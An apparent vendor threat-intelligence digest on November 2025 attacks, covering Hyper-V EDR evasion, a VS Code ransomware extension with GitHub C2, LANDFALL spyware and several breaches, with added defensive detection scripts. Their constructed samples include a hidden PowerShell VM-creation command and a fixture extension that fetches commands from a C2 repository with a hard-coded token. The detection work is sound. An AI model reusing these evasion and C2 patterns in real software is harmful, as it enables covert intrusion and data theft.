The week of November 3-10, 2025 brought further escalation in ransomware coordination, supply chain compromise and endpoint evasion, with financial institutions and enterprise infrastructure among the primary targets. This report documents four major breaches (one at a global bank), a set of critical CVEs under active exploitation including a zero-click Android zero-day, next-generation EDR evasion techniques, and large-scale darkweb credential trafficking.
NEW HACKING TECHNIQUES
1. Hyper-V Virtualization Abuse for EDR Evasion
Threat Actor: Curly COMrades (Russia-aligned)
Campaign Date: July 2025 | Disclosure: November 3-7, 2025
Attackers sidestepped endpoint security by creating a hidden Alpine Linux virtual machine on compromised Windows hosts using Microsoft Hyper-V. The lightweight VM (about 120MB on disk) hosted a custom reverse shell (CurlyShell) and a reverse proxy (CurlCat), so the implants' processes, files and sockets never appeared in the host operating system where the EDR agent runs. Outbound traffic was NAT-translated through the host's own IP address, so network telemetry attributed it to the legitimate endpoint. This is a shift in approach: rather than fighting the EDR agent (unhooking, tampering, kernel drivers), the actor isolates its tooling where the agent cannot see it. The researchers' conclusion is that as EDR becomes commodity security, capable actors turn to legitimate platform features that the tooling does not inspect; on a workstation, enabling Hyper-V and starting a VM should itself be treated as a high-value signal.
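The defensive counterpart to the technique above is to alert on the Hyper-V setup sequence itself on hosts that have no business running VMs. The following is an added example, not the researchers' tooling or anything from the original report: it runs simple command-line and image rules over normalised process-creation events (the shape a SIEM exposes for Sysmon Event ID 1 or Security 4688). The hostnames, the allowlist and the event field names are assumptions, and the sample events are constructed to mirror the enable, boot, create-on-Default-Switch, run sequence.

```python
"""Hunt for Hyper-V being enabled and used on endpoints that should never host VMs.

Added example (not Bitdefender's tooling). Input: process-creation events normalised to
{host, image, command_line}. Sample events below are constructed.
"""
import re
from collections import defaultdict

# Hypothetical allowlist of hosts that legitimately run Hyper-V.
KNOWN_VIRT_HOSTS = {"hv-lab-01"}

# (finding name, regex applied to the lower-cased command line)
COMMAND_RULES = [
    ("hyperv_enabled_dism", re.compile(r"\bdism(\.exe)?\b.*/enable-feature\b.*microsoft-hyper-v")),
    ("hyperv_enabled_powershell", re.compile(r"enable-windowsoptionalfeature\b.*microsoft-hyper-v")),
    ("hypervisor_boot_enabled", re.compile(r"\bbcdedit(\.exe)?\b.*hypervisorlaunchtype\s+auto")),
    ("vm_lifecycle_cmdlet", re.compile(r"\b(new-vm|import-vm|start-vm|set-vm|add-vmharddiskdrive|connect-vmnetworkadapter)\b")),
    ("vm_on_nat_default_switch", re.compile(r"default switch")),  # NAT through the host IP
]
# The VM worker process runs once per powered-on VM; on a workstation it should not exist.
VM_RUNTIME_IMAGES = ("\\vmwp.exe", "\\vmcompute.exe")


def hunt_hyperv_abuse(events):
    """Return one finding per (host, rule, evidence) for hosts outside the allowlist."""
    findings = []
    for ev in events:
        host = ev["host"].lower()
        if host in KNOWN_VIRT_HOSTS:
            continue
        image, cmd = ev["image"].lower(), ev["command_line"].lower()
        if image.endswith(VM_RUNTIME_IMAGES):
            findings.append({"host": host, "rule": "vm_worker_process_running", "evidence": ev["image"]})
        for name, rx in COMMAND_RULES:
            if rx.search(cmd):
                findings.append({"host": host, "rule": name, "evidence": ev["command_line"]})
    return findings


def hosts_with_full_chain(findings, min_rules=3):
    """Hosts hitting several distinct rules: enable + boot + create/run is the full pattern."""
    per_host = defaultdict(set)
    for f in findings:
        per_host[f["host"]].add(f["rule"])
    return {h for h, rules in per_host.items() if len(rules) >= min_rules}


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed
    {"host": "WS-FINANCE-07", "image": "C:\\Windows\\System32\\Dism.exe",
     "command_line": "dism.exe /online /enable-feature /featurename:Microsoft-Hyper-V /all /norestart"},
    {"host": "WS-FINANCE-07", "image": "C:\\Windows\\System32\\bcdedit.exe",
     "command_line": "bcdedit /set hypervisorlaunchtype auto"},
    {"host": "WS-FINANCE-07", "image": PS,
     "command_line": "powershell.exe -nop -w hidden -c \"New-VM -Name WSL -MemoryStartupBytes 256MB "
                     "-VHDPath C:\\ProgramData\\alpine.vhdx -SwitchName 'Default Switch'; Start-VM WSL\""},
    {"host": "WS-FINANCE-07", "image": "C:\\Windows\\System32\\vmwp.exe",
     "command_line": "\"C:\\Windows\\System32\\vmwp.exe\" 00000000-0000-0000-0000-000000000001"},
    {"host": "HV-LAB-01", "image": PS,
     "command_line": "powershell.exe -c \"New-VM -Name build-agent -SwitchName 'Default Switch'\""},
    {"host": "WS-FINANCE-08", "image": PS, "command_line": "powershell.exe -c Get-Process"},
]

if __name__ == "__main__":
    hits = hunt_hyperv_abuse(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['host']}: {h['rule']} <- {h['evidence'][:70]}")
    print("full chain on:", hosts_with_full_chain(hits))
```

The allowlist is what keeps this usable: virtualization hosts and developer machines that legitimately run Hyper-V or WSL2 (which also uses the Hyper-V platform) must be enumerated, otherwise the rule drowns in noise. Pair it with an inventory check for the Hyper-V optional feature so that a workstation acquiring it between two inventory runs is itself an alert.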
2. VS Code Extension Ransomware with GitHub C2
Malware: susvsex extension
Discovery: November 5, 2025
Researchers identified a “vibe-coded” (AI-assisted) ransomware extension that embedded file-encryption routines and used a GitHub repository as command-and-control, authenticating with a personal access token hard-coded in the extension source. The extension exhibited textbook operational-security failures: the malicious functionality was not obfuscated, the credential was stored in plaintext, and hard-coded developer test paths were left in place. It shows that AI-assisted development lowers the barrier to producing functional ransomware while reproducing the same mistakes it makes in benign code, mistakes that defenders and token-revocation processes can exploit.
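Every anti-pattern listed above is visible to a static scan of the extension's files, which is how a practitioner would triage a suspicious extension without executing it. The following is an added example, not the Secure Annex analysis or any code from the susvsex extension: it takes an extension as a {path: source} mapping (what you get by unzipping a .vsix or reading the installed extension directory) and flags hard-coded GitHub tokens, GitHub API calls used for command-and-control, encryption combined with directory walking, hard-coded developer paths and start-up activation. The sample extension is constructed; the token in it is a deliberately fake placeholder.

```python
"""Static triage of a VS Code extension for ransomware/C2 anti-patterns.

Added example (not the original research). Input: {relative path: file text}.
"""
import json
import re

# Classic PATs are ghp_ + 36 chars; fine-grained PATs are github_pat_ + a longer suffix.
GITHUB_TOKEN_RE = re.compile(r"\b(?:ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{40,})\b")
GITHUB_API_RE = re.compile(r"api\.github\.com/repos/[\w.-]+/[\w.-]+/contents")
FS_WALK_RE = re.compile(r"\b(readdirSync|readdir|opendirSync|opendir)\b")
CIPHER_RE = re.compile(r"\b(createCipheriv|createCipher|encrypt)\b")
DEV_PATH_RE = re.compile(r"[A-Za-z]:\\{1,2}Users\\{1,2}[\w.-]+|/Users/[\w.-]+|/home/[\w.-]+")
SOURCE_EXT = (".js", ".cjs", ".mjs", ".ts")


def triage_extension(files: dict) -> dict:
    """Return sorted findings and a verdict: 'block' if a credential or encrypt-walk is present."""
    findings = []
    try:
        manifest = json.loads(files.get("package.json", "{}"))
    except json.JSONDecodeError:
        manifest = {}
        findings.append("unparseable_manifest")
    events = manifest.get("activationEvents", [])
    if "*" in events or "onStartupFinished" in events:
        findings.append("activates_at_startup")          # runs without any user action
    for path, src in files.items():
        if not path.endswith(SOURCE_EXT):
            continue
        for tok in GITHUB_TOKEN_RE.findall(src):
            findings.append(f"hardcoded_github_token:{path}:{tok[:12]}")
        if GITHUB_API_RE.search(src):
            findings.append(f"github_api_c2:{path}")      # repo contents polled/pushed as C2
        if FS_WALK_RE.search(src) and CIPHER_RE.search(src):
            findings.append(f"encrypt_after_directory_walk:{path}")
        for p in sorted(set(DEV_PATH_RE.findall(src))):
            findings.append(f"hardcoded_dev_path:{path}:{p}")
    blocking = ("hardcoded_github_token", "encrypt_after_directory_walk")
    verdict = "block" if any(f.startswith(blocking) for f in findings) else "review"
    return {"findings": sorted(findings), "verdict": verdict}


SAMPLE_EXTENSION = {  # constructed; the PAT is a fake placeholder of the right shape
    "package.json": json.dumps({"name": "helper-ext", "publisher": "unknown-dev",
                                "version": "0.0.1", "activationEvents": ["*"],
                                "main": "./extension.js"}),
    "extension.js": r'''
const fs = require('fs'); const crypto = require('crypto');
const TOKEN = "ghp_EXAMPLEEXAMPLEEXAMPLEEXAMPLEEXAMPLE0";   // plaintext PAT for the C2 repo
const C2 = "https://api.github.com/repos/unknown-dev/c2/contents/cmd.txt";
function touchTree(dir) {
  for (const f of fs.readdirSync(dir)) {
    const c = crypto.createCipheriv('aes-256-cbc', crypto.randomBytes(32), crypto.randomBytes(16));
  }
}
function activate() { touchTree("C:\\Users\\dev\\test_output"); fetch(C2, { headers: { Authorization: `token ${TOKEN}` } }); }
module.exports = { activate };
''',
}

if __name__ == "__main__":
    print(json.dumps(triage_extension(SAMPLE_EXTENSION), indent=2))
```

A token found this way should be reported to GitHub and treated as the attacker's operational weak point: revoking it severs the C2 channel for every infected host at once. The verdict logic is deliberately conservative; extensions that merely activate at start-up or reference a home directory get "review", not "block".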
CRITICAL CVEs & ATTACK TECHNIQUES
1. Samsung LANDFALL Spyware – Commercial-Grade Zero-Click Exploitation
CVE: CVE-2025-21042 (CVSS 8.8)
Campaign: at least July 2024 until Samsung's April 2025 patch | Disclosure: November 6, 2025
Threat Actor: CL-UNK-1054 (Middle East commercial spyware operation)
Unit 42 researchers uncovered LANDFALL, a sophisticated Android spyware family engineered specifically for Samsung Galaxy devices. The attack exploited a zero-day in Samsung's image processing library to achieve remote code execution from image files delivered over WhatsApp, with no user interaction required. Attackers embedded two ELF binaries (a loader and a SELinux policy manipulator) within malformed DNG image files; memory corruption triggered during image decoding handed control to the loader. The spyware collected microphone recordings, GPS locations, photos, contacts, and call logs. The campaign ran undetected for months (from at least July 2024 until the April 2025 patch), and its structure and targeting suggest a private-sector offensive actor (PSOA).
Technical Details:
- Attack vector: Malformed DNG image file sent via WhatsApp
- Trigger: Image preview initiates vulnerable decoding process
- Payload 1 (b.so): 106KB ARM64 ELF backdoor for comprehensive surveillance
- Payload 2 (l.so): XZ-compressed binary manipulating SELinux policy for privilege escalation
- Persistence: Survives reboots through system-level integration
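A DNG is a TIFF container: a header, then a chain of image file directories (IFDs) whose entries point at tag data and image strips or tiles. Executable content smuggled into such a file has to live somewhere the decoder does not account for, which gives a file-level triage check independent of the vulnerable parser. The following is an added example, not Unit 42's tooling or anything recovered from LANDFALL: it walks the IFD chain (including DNG sub-IFDs), records the highest byte the structure legitimately references, and reports data beyond that point, ELF or ZIP magic anywhere in the file, and entries pointing outside the file. build_sample_dng() constructs a minimal TIFF for the demonstration; the tolerance threshold is an assumption.

```python
"""Triage a TIFF/DNG file for payloads hidden outside the image structure.

Added example (not the original research). analyze_dng() returns structural findings;
build_sample_dng() constructs a minimal file to run it against.
"""
import struct

TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1, 8: 2, 9: 4, 10: 8,
              11: 4, 12: 8, 13: 4, 16: 8, 17: 8, 18: 8}
OFFSET_COUNT_TAGS = {273: 279, 324: 325}  # StripOffsets/StripByteCounts, TileOffsets/TileByteCounts
SUBIFDS_TAG = 330                         # DNG keeps raw/preview images in sub-IFDs
EXECUTABLE_MAGICS = {b"\x7fELF": "elf", b"PK\x03\x04": "zip"}
SLACK_TOLERANCE = 64                      # assumption: a few padding bytes are normal, kilobytes are not


def analyze_dng(data: bytes) -> dict:
    if len(data) < 8 or data[:2] not in (b"II", b"MM"):
        return {"valid_tiff": False, "findings": ["not_a_tiff"], "suspicious": True}
    e = "<" if data[:2] == b"II" else ">"
    tiff_magic, first_ifd = struct.unpack(e + "HI", data[2:8])
    if tiff_magic != 42:
        return {"valid_tiff": False, "findings": ["bad_tiff_magic"], "suspicious": True}

    findings, reach, seen, pending = [], 8, set(), [first_ifd]
    while pending:
        off = pending.pop()
        if off == 0 or off in seen:
            continue
        seen.add(off)
        if off + 2 > len(data):
            findings.append(f"ifd_outside_file:{off}")
            continue
        n = struct.unpack(e + "H", data[off:off + 2])[0]
        end = off + 2 + 12 * n + 4
        if end > len(data):
            findings.append(f"ifd_truncated:{off}")
            continue
        reach = max(reach, end)
        values = {}
        for i in range(n):
            pos = off + 2 + 12 * i
            tag, typ, cnt = struct.unpack(e + "HHI", data[pos:pos + 8])
            if typ not in TYPE_SIZES:
                findings.append(f"tag_{tag}_unknown_type:{typ}")
                continue
            size = TYPE_SIZES[typ] * cnt
            if size <= 4:
                raw = data[pos + 8:pos + 8 + size]            # value stored inline
            else:
                start = struct.unpack(e + "I", data[pos + 8:pos + 12])[0]
                if start + size > len(data):
                    findings.append(f"tag_{tag}_points_outside_file")
                    continue
                reach = max(reach, start + size)
                raw = data[start:start + size]
            if typ in (3, 4, 13) and cnt:                      # SHORT / LONG / IFD offsets
                values[tag] = list(struct.unpack(e + {3: "H", 4: "I", 13: "I"}[typ] * cnt, raw))
        for off_tag, cnt_tag in OFFSET_COUNT_TAGS.items():    # image data referenced by offset+count
            for o, c in zip(values.get(off_tag, []), values.get(cnt_tag, [])):
                if o + c > len(data):
                    findings.append(f"tag_{off_tag}_data_outside_file")
                else:
                    reach = max(reach, o + c)
        pending.extend(values.get(SUBIFDS_TAG, []))
        pending.append(struct.unpack(e + "I", data[end - 4:end])[0])  # next IFD in the chain

    trailing = len(data) - reach
    if trailing > 0:
        findings.append(f"trailing_bytes:{trailing}")
    for magic_bytes, name in EXECUTABLE_MAGICS.items():
        idx = data.find(magic_bytes)
        if idx != -1:
            findings.append(f"embedded_{name}_at:{idx}")
    suspicious = trailing > SLACK_TOLERANCE or any(
        f.startswith(("embedded_", "tag_", "ifd_")) for f in findings)
    return {"valid_tiff": True, "referenced_extent": reach, "trailing_bytes": trailing,
            "findings": findings, "suspicious": suspicious}


def build_sample_dng(payload: bytes) -> bytes:
    """Constructed minimal little-endian TIFF: one IFD, a 16-byte strip, then `payload`."""
    n, ifd_off = 4, 8
    strip_off = ifd_off + 2 + 12 * n + 4                    # strip starts right after the IFD
    strip = b"\x00" * 16
    entries = [
        (256, 3, 1, struct.pack("<H", 4) + b"\x00\x00"),   # ImageWidth (inline SHORT, padded)
        (257, 3, 1, struct.pack("<H", 4) + b"\x00\x00"),   # ImageLength
        (273, 4, 1, struct.pack("<I", strip_off)),         # StripOffsets
        (279, 4, 1, struct.pack("<I", len(strip))),        # StripByteCounts
    ]
    ifd = struct.pack("<H", n)
    ifd += b"".join(struct.pack("<HHI", t, ty, c) + v for t, ty, c, v in entries)
    ifd += struct.pack("<I", 0)                            # no next IFD
    return b"II" + struct.pack("<HI", 42, ifd_off) + ifd + strip + payload


if __name__ == "__main__":
    print(analyze_dng(build_sample_dng(b"")))
    print(analyze_dng(build_sample_dng(b"\x7fELF\x02\x01\x01" + b"\x00" * 100)))
```

This is a triage heuristic for mail gateways and sandboxes, not a substitute for the patch: a payload can also be hidden inside an oversized but correctly referenced tag, and XZ-compressed data (as described for l.so) carries no ELF magic until decompressed, so the structural "what does the IFD chain account for" view is the more robust of the two checks.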
2. Cisco Unified CCX – Dual Critical RCE Vulnerabilities
CVEs: CVE-2025-20354 & CVE-2025-20358
CVSS: 9.8 (CVE-2025-20354) / 9.4 (CVE-2025-20358)
Disclosure: November 5, 2025
Cisco disclosed two critical flaws in Unified Contact Center Express (CCX), its contact center platform for small and medium deployments. CVE-2025-20354 (Java RMI RCE): improper authentication on the Java RMI process lets an unauthenticated remote attacker upload arbitrary files and execute commands with root privileges. CVE-2025-20358 (CCX Editor authentication bypass): the attacker redirects the Editor's authentication flow to a malicious server, tricks the client into treating authentication as successful, then creates and runs arbitrary scripts on the underlying OS as an internal non-root user. No workarounds exist; patching is mandatory, and until it is done the RMI interface should not be reachable from untrusted networks.
MAJOR BREACHES
BREACH 1: Habib Bank AG Zurich – 2.5TB Data Exfiltration
Date: November 5, 2025 (Disclosure)
Attacker: Qilin Ransomware Gang
Data: 2.5TB (2 million files)
Target: Global bank operating across Switzerland, UK, UAE, Hong Kong, Kenya, South Africa and Canada
Overview:
Qilin claimed responsibility for stealing 2.5 terabytes from Habib Bank AG Zurich and posted sample screenshots as proof. The data reportedly includes passport numbers, account balances, transaction histories, KYC documentation, and source code for internal banking tools.
Explanation:
The intrusion vector has not been disclosed; the most common Qilin entry points are compromised credentials and unpatched remote-access appliances, and accumulating 2.5TB suggests weeks of undetected presence. Exposed source code gives attackers a head start on vulnerability research against the bank's own applications. Transaction location data, which reveals movement and spending patterns, creates targeted-fraud and physical-safety risk for high-net-worth customers.
Impact/Risk:
- Immediate: customers whose KYC and transaction records sit in the 2 million stolen files are exposed to identity theft, SIM swapping and wire fraud
- Banking System: stolen source code enables targeted exploitation; infrastructure details reveal the security architecture
- Regulatory: data-protection enforcement in every jurisdiction of operation (GDPR-derived regimes alone carry fines up to €20M or 4% of global turnover) plus FINMA supervisory action in Switzerland
- Ecosystem: data monetization through criminal syndicates; credential stuffing against other financial institutions
CISO Takeaway: Qilin's alliance with LockBit and DragonForce (a ransomware super-group announced in October) makes the banking sector a premium target. Assume 30-90 days of dwell time before detection; preventive access controls, MFA on every remote-access path, and segmentation that limits how much a single foothold can reach are critical.
BREACH 2: Nikkei Inc. – Infostealer-to-Slack Compromise
Date: August 2025 (Infection) | November 4, 2025 (Disclosure)
Affected: 17,368 employees and business partners
Data: Slack chat histories, developer channel content, internal communications
Explanation:
An employee's personal computer, used for work Slack access, was infected with infostealer malware that harvested the Slack session tokens from browser storage. The attacker replayed those tokens to authenticate as the employee, without needing the password or a fresh MFA challenge, and read internal channels, reportedly including developer channels containing code snippets, API keys, project timelines and strategic communications. Nikkei detected the access in September 2025 and formally disclosed it in November 2025.
Impact: A news organization's internal deliberations and editorial communications exposed to competitors and threat actors. Hudson Rock research shows 270,000+ Slack credentials harvested globally through infostealers. A stolen session token survives a password reset and bypasses MFA by design; the controls that matter are restricting Slack to managed devices and revoking all sessions as soon as a stealer infection is suspected.
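Two checks follow directly from this breach: find Slack tokens wherever they have leaked so they can be revoked, and spot a replayed session in the sign-in log. The following is an added example, not Nikkei's or Slack's tooling. find_slack_tokens() greps text (a browser localStorage or cookie dump, a stealer log, a pasted config) for Slack token shapes; detect_session_hijack() replays sign-in records shaped like Slack audit-log user_login entries and flags a user whose session appears from a country and a client family never seen for them before, which is how a stolen token replayed from attacker infrastructure typically looks. All sample data is constructed and the record field names are assumptions.

```python
"""Slack token hunting and session-replay detection for the infostealer-to-Slack path.

Added example (not Nikkei's or Slack's code). Sample data below is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

# xoxb bot, xoxp user, xoxc browser client, xoxd the 'd' session cookie, xoxe refresh, xoxs legacy
SLACK_TOKEN_RE = re.compile(r"\bxox[bpcdes]-[A-Za-z0-9-]{10,}")
CLIENT_FAMILIES = ("slack/", "firefox", "edg/", "chrome", "safari", "curl", "python")


def find_slack_tokens(text: str) -> list:
    """Distinct Slack-shaped tokens in `text`, sorted for stable reporting."""
    return sorted(set(SLACK_TOKEN_RE.findall(text)))


def client_family(user_agent: str) -> str:
    ua = user_agent.lower()
    for name in CLIENT_FAMILIES:   # order matters: Chrome UAs also contain 'safari'
        if name in ua:
            return name.rstrip("/")
    return "other"


def detect_session_hijack(logins: list) -> list:
    """Alert when a user's sign-in comes from a country AND a client family that are both
    new for that user. Same-client travel is tolerated; a scripted client in a new country is not."""
    seen = defaultdict(set)          # user -> {(country, client_family)}
    last_good = {}                   # user -> datetime of last accepted sign-in
    alerts = []
    for ev in sorted(logins, key=lambda e: e["ts"]):
        user, when = ev["user"], datetime.fromisoformat(ev["ts"])
        key = (ev["country"], client_family(ev["user_agent"]))
        known_countries = {c for c, _ in seen[user]}
        known_clients = {f for _, f in seen[user]}
        if seen[user] and key[0] not in known_countries and key[1] not in known_clients:
            alerts.append({"user": user, "ip": ev["ip"], "country": key[0], "client": key[1],
                           "hours_since_last_good": (when - last_good[user]).total_seconds() / 3600,
                           "action": "revoke all sessions; rotate secrets shared in channels"})
        else:
            seen[user].add(key)
            last_good[user] = when
    return alerts


# constructed: what a stealer pulls from a browser profile (localStorage plus the 'd' cookie)
SAMPLE_STORAGE_DUMP = """
localConfig_v2={"teams":{"T0EXAMPLE1":{"token":"xoxc-111111111111-222222222222-EXAMPLEEXAMPLE"}}}
Cookie: d=xoxd-EXAMPLEcookieEXAMPLEcookie%2Fsuffix; b=unrelated
log line mentioning xoxz-notatoken and nothing else
"""

SAMPLE_LOGINS = [  # constructed; shaped like Slack audit-log user_login entries
    {"ts": "2025-08-01T01:00:00+00:00", "user": "alice", "ip": "203.0.113.10", "country": "JP",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/128.0 Safari/537.36"},
    {"ts": "2025-08-02T00:30:00+00:00", "user": "alice", "ip": "203.0.113.11", "country": "JP",
     "user_agent": "Slack/4.39.95 Electron Chrome/128.0"},
    {"ts": "2025-08-03T14:12:00+00:00", "user": "alice", "ip": "198.51.100.77", "country": "NL",
     "user_agent": "python-requests/2.32"},
    {"ts": "2025-08-01T02:00:00+00:00", "user": "bob", "ip": "203.0.113.20", "country": "JP",
     "user_agent": "Mozilla/5.0 (Macintosh) Chrome/128.0 Safari/537.36"},
    {"ts": "2025-08-04T09:00:00+00:00", "user": "bob", "ip": "192.0.2.5", "country": "US",
     "user_agent": "Mozilla/5.0 (Macintosh) Chrome/128.0 Safari/537.36"},
]

if __name__ == "__main__":
    print("tokens to revoke:", find_slack_tokens(SAMPLE_STORAGE_DUMP))
    for a in detect_session_hijack(SAMPLE_LOGINS):
        print("ALERT", a)
```

The country-and-client rule is deliberately narrow so that a travelling employee on their usual laptop (bob) is not flagged; an attacker who copies the victim's exact user agent and routes through the victim's country defeats it, which is why session revocation on any confirmed stealer infection, not detection alone, is the primary control.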
BREACH 3: Askul Corporation – RansomHouse Extortion
Date: October 19, 2025 (Discovery) | November 4-7, 2025 (Formal Disclosure)
Attacker: RansomHouse (data-extortion group)
Data: 1.1TB (1.1 million files)
Affected Companies: Askul, Muji/Ryohin Keikaku, Loft (major Japanese retailers)
Explanation:
Askul detected the ransomware attack on October 19, 2025 and suspended order intake and shipping while systems were rebuilt; RansomHouse listed the company on its leak site on October 30, claiming 1.1TB, and Askul confirmed the data theft on November 4. RansomHouse's leverage rests primarily on the stolen data and the reputational damage of a leak rather than on the encryption itself. Data reportedly included customer names, purchase histories, payment information, supplier contracts, and employee records.
Impact: Multi-week disruption of Askul's own e-commerce and B2B ordering; millions of customer records exposed; Muji and Loft, which outsource online-store fulfillment to Askul, had to suspend online sales, a supply chain cascade from a single logistics provider.
BREACH 4: Washington Post – Oracle E-Business Suite Campaign
Date: November 6-7, 2025 (Disclosure)
Attacker: Clop Ransomware Gang
Victims: 100+ organizations globally
Vector: CVE-2025-61882 (CVSS 9.8) – Unauthenticated RCE in Oracle EBS
Explanation:
Clop exploited CVE-2025-61882, an unauthenticated remote code execution flaw in Oracle E-Business Suite, for reconnaissance, database queries and bulk data exfiltration across 100+ victims. The Washington Post acknowledged it was among them; Clop's extortion demands reportedly reached $50M for some victims. Oracle issued an emergency patch and indicators of compromise; CISA added the CVE to its Known Exploited Vulnerabilities catalog with a remediation deadline for federal agencies.
Impact: EBS systems manage HR, payroll, supply chain, and financials for Fortune 500 companies and government agencies. A single vulnerability yielding 100+ simultaneous victims shows how risk concentrates in widely deployed enterprise suites.
DARKWEB CHATTER & THREAT ACTOR COORDINATION
Ransomware Ecosystem Status
- LockBit/Qilin/DragonForce Alliance: Announced October 2025; operational coordination November 2025; estimated 1,000+ attacks monthly
- Credential Trafficking: 10 billion plaintext passwords posted free November 5, 2025; government email accounts selling for $40 each
- RansomHouse Operations: 124+ claimed attacks; professional mediator positioning; 60%+ victim payment rate
- Zero-Day Trading: CVE-2025-59287 (WSUS RCE) actively traded; PoC available; 2,500-6,000 exposed targets
Underground Forum Intelligence
- Initial Access Brokers: Selling network access at $500-$50K; 5-10 new offerings daily; 70% purchased by ransomware gangs
- Law Enforcement Compromises: Active .gov/.police email accounts available for $40-500; threat actors demonstrating access to law enforcement databases
- Exploit Framework Sharing: CVE-2025-11371 (Gladinet LFI) exploitation framework publicly shared; CVE-2025-48703 (CWP) mass exploitation underway
- Commercial Spyware: LANDFALL infrastructure suggests PSOA or state-aligned involvement; WhatsApp zero-click exploits advertised as premium offering
Outpace Attackers With AI-Based Automated Penetration Testing With FireCompass:
FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing and Next-Gen Attack Surface Management.